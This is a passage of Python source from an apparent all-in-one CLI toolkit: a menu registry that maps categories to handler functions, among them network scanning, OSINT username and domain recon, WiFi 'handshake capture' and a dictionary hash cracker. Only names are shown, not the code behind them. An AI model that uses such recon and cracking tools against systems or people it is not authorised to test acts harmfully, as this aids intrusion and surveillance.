            ("ARP scan", cmd_arp_scan),
            ("HTTP methods probe", cmd_http_methods),
        ],
        "DNS": [
            ("Lookup A/AAAA", cmd_dns_lookup),
            ("Reverse DNS", cmd_reverse_dns),
            ("SPF / DMARC", cmd_spf_dmarc),
        ],
        "Ping Sweep": [("CIDR ping sweep", cmd_ping_sweep)],
        "Traceroute": [("Run traceroute", cmd_traceroute)],
        "Bandwidth Monitor": [("Download speed test", cmd_bandwidth_test)],
        "Port Forwarder": [("TCP forwarder", cmd_port_forward)],
        "DNS Lookup": [("Lookup A/AAAA", cmd_dns_lookup)],
        "Custom": [("Domain recon", cmd_recon), ("Headers dump", cmd_headers_dump)],
    },
    "Developer": {
        "Code Generator": [("Snippet manager", cmd_snippet_manager)],
        "Boilerplate": [("Snippet manager", cmd_snippet_manager)],
        "Git Helper": [
            ("GitHub user info", cmd_github_user),
            ("List GitHub repos", cmd_github_repos),
            ("System info", cmd_system),
        ],
        "Regex Tester": [("Run regex", cmd_regex_tester)],
        "Snippet Manager": [("Manage snippets", cmd_snippet_manager)],
        "UUID Tool": [("Generate / parse UUID", cmd_uuid_tool)],
        "Timestamp": [("Unix <> ISO", cmd_timestamp_conv)],
        "Custom": [
            ("JSON pretty / minify", cmd_json_pretty),
            ("TOML viewer", cmd_toml_view),
        ],
    },
    "Automation": {
        "Task Runner": [("Todo list", cmd_todo)],
        "File Batch": [
            ("Hexdump a file", cmd_hexdump),
            ("Hash a file", cmd_file_hash),
            ("Inspect zip", cmd_zip_inspect),
        ],
        "Web Scraper": [
            ("Scrape links", cmd_web_scraper),
            ("Sitemap parser", cmd_sitemap_parser),
            ("robots.txt parser", cmd_robots_parser),
        ],
        "Scheduler": [("Timer", cmd_timer), ("Cron builder", cmd_cron_builder)],
        "Custom": [("Todo list", cmd_todo)],
    },
    "API": {
        "REST Client": [
            ("REST request", cmd_rest_client),
            ("Headers dump", cmd_headers_dump),
            ("HTTP methods probe", cmd_http_methods),
        ],
        "GraphQL Client": [("REST request (fallback)", cmd_rest_client)],
        "Webhook Server": [("Run webhook server", cmd_webhook_server)],
        "Mock Server": [("Run webhook server (mock)", cmd_webhook_server)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "OSINT": {
        "Username Lookup": [
            ("Cross-site search", cmd_username_lookup),
            ("GitHub user", cmd_github_user),
            ("GitHub repos", cmd_github_repos),
        ],
        "Email Recon": [("MX + DMARC", cmd_email_validate)],
        "Domain Recon": [
            ("DNS + robots + security.txt", cmd_recon),
            ("Wayback", cmd_wayback),
            ("Certificate Transparency", cmd_cert_transparency),
            ("SPF / DMARC", cmd_spf_dmarc),
            ("Reverse DNS", cmd_reverse_dns),
        ],
        "Social Scan": [("Cross-site search", cmd_username_lookup)],
        "Geolocation": [("IP geolocation", cmd_ip_geolocation)],
        "Custom": [("Domain recon", cmd_recon)],
    },
    "Bluetooth": {
        "Device Scan": [("hcitool/bluetoothctl scan", cmd_bluetooth_scan)],
        "BLE Tool": [("Bluetooth scan", cmd_bluetooth_scan)],
        "GATT Explorer": [("Bluetooth scan", cmd_bluetooth_scan)],
        "Custom": [("Bluetooth scan", cmd_bluetooth_scan)],
    },
    "WiFi": {
        "Network Scan": [
            ("nmcli/iwlist scan", cmd_wifi_scan),
            ("MAC vendor lookup", cmd_mac_vendor),
        ],
        "Handshake Capture Helper": [("WiFi scan", cmd_wifi_scan)],
        "Signal Mapper": [("WiFi scan", cmd_wifi_scan)],
        "Custom": [("WiFi scan", cmd_wifi_scan)],
    },
    "RF": {
        "SDR Helper": [("System info", cmd_system)],
        "Frequency Scanner": [("System info", cmd_system)],
        "Custom": [("System info", cmd_system)],
    },
    "Hardware": {
        "Serial Monitor": [
            ("List serial ports", cmd_serial_monitor),
            ("Hexdump a file", cmd_hexdump),
        ],
        "Flasher": [("System info", cmd_system)],
        "Sensor Reader": [("System info", cmd_system)],
        "Custom": [("Serial monitor", cmd_serial_monitor)],
    },
    "ESP32": {
        "Firmware Flasher": [("Serial monitor", cmd_serial_monitor)],
        "OTA Helper": [("Serial monitor", cmd_serial_monitor)],
        "MQTT Bridge": [("IoT discovery", cmd_iot_discovery)],
        "Custom": [("Serial monitor", cmd_serial_monitor)],
    },
    "Arduino": {
        "Sketch Builder": [("Snippet manager", cmd_snippet_manager)],
        "Serial Console": [("Serial monitor", cmd_serial_monitor)],
        "Custom": [("Serial monitor", cmd_serial_monitor)],
    },
    "IoT": {
        "Device Discovery": [
            ("mDNS browse", cmd_iot_discovery),
            ("MAC vendor lookup", cmd_mac_vendor),
        ],
        "MQTT Client": [("mDNS browse", cmd_iot_discovery)],
        "Telemetry Viewer": [("System info", cmd_system)],
        "Custom": [("mDNS browse", cmd_iot_discovery)],
    },
    "CLI Utility": {
        "Calculator": [
            ("Evaluate expression", cmd_calculator),
            ("Unit converter", cmd_unit_convert),
            ("Color converter", cmd_color_tool),
            ("Color palette", cmd_color_palette),
            ("Base converter", cmd_base_convert),
        ],
        "Unit Converter": [("Convert units", cmd_unit_convert)],
        "Password Gen": [
            ("Generate password", cmd_password_gen),
            ("Generate secure token", cmd_random_token),
            ("UUID generator", cmd_uuid_tool),
        ],
        "Color Tool": [
            ("Convert colors", cmd_color_tool),
            ("Generate palette", cmd_color_palette),
        ],
        "Encoder": [
            ("Encoder/Decoder", cmd_encode),
            ("Morse code", cmd_morse),
            ("ROT all shifts", cmd_rot_all),
            ("Vigenere cipher", cmd_vigenere),
            ("JSON pretty / minify", cmd_json_pretty),
            ("TOML viewer", cmd_toml_view),
            ("Diff two strings", cmd_diff_text),
            ("Word count", cmd_word_count),
            ("Timestamp conversion", cmd_timestamp_conv),
        ],
        "Custom": [
            ("Calculator", cmd_calculator),
            ("Color tool", cmd_color_tool),
            ("UUID generator", cmd_uuid_tool),
        ],
    },
    "AI": {
        "Prompt Runner": [("REST request (LLM endpoint)", cmd_rest_client)],
        "LLM Client": [("REST request (LLM endpoint)", cmd_rest_client)],
        "Vector Search": [("Regex search local snippets", cmd_snippet_manager)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "Machine Learning": {
        "Dataset Cleaner": [("Snippet manager (jsonl)", cmd_snippet_manager)],
        "Model Trainer": [("System info", cmd_system)],
        "Eval Tool": [("REST request", cmd_rest_client)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "Forensics": {
        "Disk Image": [("Hash a file", cmd_file_hash), ("Hexdump", cmd_hexdump)],
        "Memory Dump": [("Hash a file", cmd_file_hash), ("Hexdump", cmd_hexdump)],
        "Timeline Builder": [("Log analyzer", cmd_log_analyzer)],
        "Zip Inspection": [("Inspect zip", cmd_zip_inspect)],
        "Custom": [("Hash file", cmd_file_hash)],
    },
    "Password Tools": {
        "Generator": [
            ("Generate password", cmd_password_gen),
            ("Generate secure token", cmd_random_token),
        ],
        "Strength Meter": [("Measure entropy", cmd_strength)],
        "Hash Cracker Helper": [("Dictionary cracker", cmd_hash_cracker)],
        "Vault": [("Snippet manager", cmd_snippet_manager)],
        "Custom": [("Password generator", cmd_password_gen)],
    },
    "Monitoring": {
        "System Watcher": [
            ("Network sampler", cmd_network_monitor),
            ("ARP scan", cmd_arp_scan),
        ],
        "Log Tail": [("Log analyzer", cmd_log_analyzer)],
        "Uptime Pinger": [
            ("Ping sweep", cmd_ping_sweep),
            ("Traceroute", cmd_traceroute),
        ],
        "Custom": [("Network monitor", cmd_network_monitor)],
    },
    "Discord": {
        "Bot Template": [
            ("REST request (Discord API)", cmd_rest_client),
            ("Webhook server", cmd_webhook_server),
        ],
        "Webhook Sender": [("REST request (Discord API)", cmd_rest_client)],
        "Message Logger": [("Webhook server", cmd_webhook_server)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "Telegram": {
        "Bot Template": [("REST request (Telegram API)", cmd_rest_client)],
        "Channel Poster": [("REST request (Telegram API)", cmd_rest_client)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "WhatsApp": {
        "Web Client": [("REST request", cmd_rest_client)],
        "Auto Reply": [("Webhook server", cmd_webhook_server)],
        "Custom": [("REST request", cmd_rest_client)],
    },
    "Crypto": {
        "Price Tracker": [("Fetch live price", cmd_crypto_price)],
        "Wallet Tool": [("Hash helper", cmd_hash), ("Generate token", cmd_random_token)],
        "Transaction Decoder": [
            ("Hex decode", cmd_encode),
            ("Base58", cmd_base58),
        ],
        "Custom": [("Price tracker", cmd_crypto_price)],
    },
    "Productivity": {
        "Todo": [("Todo list", cmd_todo)],
        "Notes": [("Snippet manager", cmd_snippet_manager)],
        "Timer": [("Countdown", cmd_timer), ("Cron builder", cmd_cron_builder)],
        "Kanban": [("Todo list", cmd_todo)],
        "Text Tools": [
            ("Word count", cmd_word_count),
            ("Diff two strings", cmd_diff_text),
            ("JSON pretty / minify", cmd_json_pretty),
        ],
        "Custom": [("Todo list", cmd_todo)],
    },
    "Custom": {
        "Custom": [
            ("System info", cmd_system),
            ("Help", cmd_help),
            ("Generate password", cmd_password_gen),
            ("UUID generator", cmd_uuid_tool),
            ("Timestamp conversion", cmd_timestamp_conv),
            ("JSON pretty / minify", cmd_json_pretty),
        ],
    },
}


def commands_for(category: str, subcategory: str) -> List[Tuple[str, Callable]]:
    bucket = COMMANDS.get(category, {})
    return bucket.get(subcategory, bucket.get("Custom", []))
